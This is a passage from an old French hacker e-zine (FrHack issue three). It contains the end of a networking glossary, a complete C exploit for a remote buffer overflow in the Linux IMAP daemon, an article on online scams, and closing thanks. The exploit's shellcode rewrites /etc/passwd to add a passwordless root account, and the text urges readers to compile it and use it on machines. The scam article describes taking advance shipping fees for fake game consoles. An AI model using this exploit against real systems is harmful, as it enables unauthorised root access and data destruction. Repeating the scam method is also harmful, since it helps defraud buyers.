- Acronyme de "Wide Area Information Server". Il s'agit d'une mthode de recherche de 
documents qui s'appuie sur la mise en place de serveurs spcialiss abritant de gigantesques 
bases de donnes rfrenant les ressources accessibles                     au travers d'Internet.

* WAN :
- Acronyme de "Wide Area Network", ce qui se traduit par rseau informatique  longues 
distances. 0n classe dans la catgorie des WAN tous les rseaux informatiques publics ou privs 
qui permettent d'changer des donnes sur des                     dizaines de kilomtres et qui sont 
susceptibles d'accepter une extension de leur couverture par l'adjonction de nouvelles portions 
de rseau.

* WinSock :
- Windows Socket, une API (Application Programming Interface) permettant de faire fonctionner 
des applications Windows sur un rseau TCP/IP.

* World Wide Web (WWW ou W3) :
- On regroupe sous cette expression tous les serveurs contenant des documents HTML . En 
raison des liens hypertextes (v.) que contiennent ces derniers, ces serveurs constituent une 
gigantesque "toile d'araigne" numrique de couverture                    mondiale.


@ X @

Aucune dfinition disponible 

@ Y @

Aucune dfinition disponible 

@ Z @

Aucune dfinition disponible 



=== Petit mot de la fin de l'auteur  ===

Bon.. et bien aprs 10 Sprite, 6 packs de 12 Export, pis 2 pizzas (1 au jambon, l'autre au 
pepperoni), je russi enfin a finir mon glossaire. Je remercie Dieu (pffff t'en collerais une moi de 
Dieu *&?*(& ;), ma mre, sans qui je serais pas l, mon ordi, sans qui et je dis bien "qui" et pas 
"quoi", sans qui je n'aurais pu crire cet article et enfin, mes chats pour m'avoir dormis en pleine 
face.
Bonne anne ( on est le 6 janvier, c'est toujours de rigueur ) et a ciao.

The FrHack Crew
Gabber

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Bug du dmon Imap



Bonjour, j'ai rcemment trouv sur internet (sur ma disquette plutt) [ Huh ?!?]
un exploit concernant le hole dans du dmon imap de Linux.  Le code plus bas ouvre,
/etc/passwd ( changez le pour /etc/shadow au besoin ). Le probleme c'est que ca
remplace la premiere ligne du /etc/shadow, ce qui fait donc perdre le root passwd,
mais vu qu'on est l pour le hacker, on s'en fou. Compiler ca dans le style gcc -o imap imap.c, 
excutez-le ( ./imap) et le tour est jou. Vous avez sans doute remarquer que pour runner ca sur 
une box, ca serais un atout d'avoir dj un account dessus non ? Bon, alors essayer a et 
amusez-vous. 

  
*/

#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <netdb.h>

char *h_to_ip(char *hostname);

char *h_to_ip(char *hostname) {

  struct hostent *h;
  struct sockaddr_in tmp;
  struct in_addr in;

  h = gethostbyname(hostname);

  if (h==NULL) { perror("Resolving the host. \n"); exit(-1); }

  memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length);
  memcpy(&in,&tmp.sin_addr.s_addr,4);

return(inet_ntoa(in));
}

void banner(void) {
  system("clear");
  printf("\nIMAP Exploit for Linux.\n");
  printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n");
  printf(" Modifications: ASHMEU (ashmeu@godzworld.com)\n");
}

main(int argc, char **argv) {

  int fd;
  struct sockaddr_in sckdaddr;
  char *hostname;
  char buf[4092];
  int i=8;
  char realegg[] =
    "\xeb\x58\x5e"
    "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
    "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
    "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
    "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
    "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
    "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
    "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
    "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
    "iamaselfmodifyingmonsteryeahiam\xe8\x83\xff\xff\xff"
    "/etc/passwdxroot::0:0:r00t:/:/bin/bashx";
  char *point = realegg;
  buf[0]='*';
  buf[1]=' ';
  buf[2]='l';
  buf[3]='o';
  buf[4]='g';
  buf[5]='i';
  buf[6]='n';
  buf[7]=' ';

  banner();

  if (argc<2)  {
     printf("\nUsage: %s <hostname>\n\n", argv[0]);
     exit(-1);
  }

  hostname=argv[1];

  while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */
    buf[i++]=0x90;

  while(*point)
    buf[i++]=*(point++);

  buf[i++]=0x83; /* ebp */
  buf[i++]=0xf3;
  buf[i++]=0xff;
  buf[i++]=0xbf;
  buf[i++]=0x88; /* ret adr */
  buf[i++]=0xf8;
  buf[i++]=0xff;
  buf[i++]=0xbf;

  buf[i++]=' ';
  buf[i++]='b';
  buf[i++]='a';
  buf[i++]='h';
  buf[i++]='\n';

  buf[i++]=0x0;


  if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the
socket. \n");

  sckdaddr.sin_port=htons(143);
  sckdaddr.sin_family=AF_INET;
  sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname));

  if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0)
perror("Error with connecting. \n");

  printf("hmm: \n");
  getchar();
  write(fd,buf,strlen(buf)+1);
  printf("hmm: \n");
  close(fd);
}

/*   PiCK The PoWeR aT http://www.godzworld.com
 The FrHack Crew
Ashmeu

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Comment se faire de l'argent sur Internet ?


Ce texte n'a t rdig qu' titre d'information.

1) Internet: lieu d'changes...

Internet est un lieu d'changes, ou tout se vends et tout ce trouve. Admettons qu'un personne X
veuille vendre des "fausses" consoles de jeux par exemple. Il lui suffit de poster des annonces 
sur des sites tel que www.jeuxvideo.com, et il recevra des rponses trs rapidement.
Admettons que cette personne X trouve un "client" ou plutt un "pigeon".
La personne X donnera le prix de la console qu'elle dsire vendre, et se dbrouillera pour que 
le "client" soit intress par l'offre.
Voici un exemple:
Une personne X veut gagner de l'argent facilement, elle prtend vendre des consoles de jeux et 
poste des annonces sur www.jeuxvideo.com.
Une personne Y lui rpond et lui demande comment faire pour le payement.
La personne X rpond qu'elle envoie la console en contre remboursement, mais qu'il faut que la 
personne Y paye les frais de port en avance.
La personne X a un compte en banque et donne ses coordonnes a la personne Y.
La personne Y met la somme que reprsente les frais de port (disons 250 fr).
La personne X disparat, la personne X a gagn 250 fr...
Grce  Internet, des escroc peuvent librement s'enrichir puisque lors de ventes, il
n'existe aucun contrat pour la vente et souvent aucun renseignement sur le vendeur.

2) Les internautes, tous des pigeons ?

Non bien sur, nous ne sommes pas tous des pigeons, mais les escroc se dbrouilleront toujours
pour trouver la cible idale...
Un conseil tout de mme, faite comme moi: N'achetez rien sur Internet...


Collaborateur de FrHack
|Pr0tek|

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Conclusion

Nous esprons que vous avez apprci le troisime Emag de FrHack et nous comptons en sortir 
un quatrime ds la mi-fvrier. Je tiens  remercier tous les supporteurs de FrHack, tous les 
membres et tous ceux qui m'ont aid pour la publication de ce Emag. Je remercie galement 
tous les hackers, phone phreak, crackeur et codeurs qui continue sans cesse de faire leur beau 
boulot. Remerciement spcial :
-Oktober notre guru de linux prfr, qui a galement faite la page web de FrHack.
-ASHMEU qui, avec ses talents en franais  corriger le Emag.
-Le monde qui frquente le channel irc #hack.fr pour m'avoir fournit le support moral et la 
conviction que je ne faisais pas ca pour rien.
-Buble et Kthulu d'tre apparu en plein au bon moment ;-)

Pour vos questions, commentaires et suggestions : FrHack@hotmail.com

Snowcrach et l'quipe de FrHack
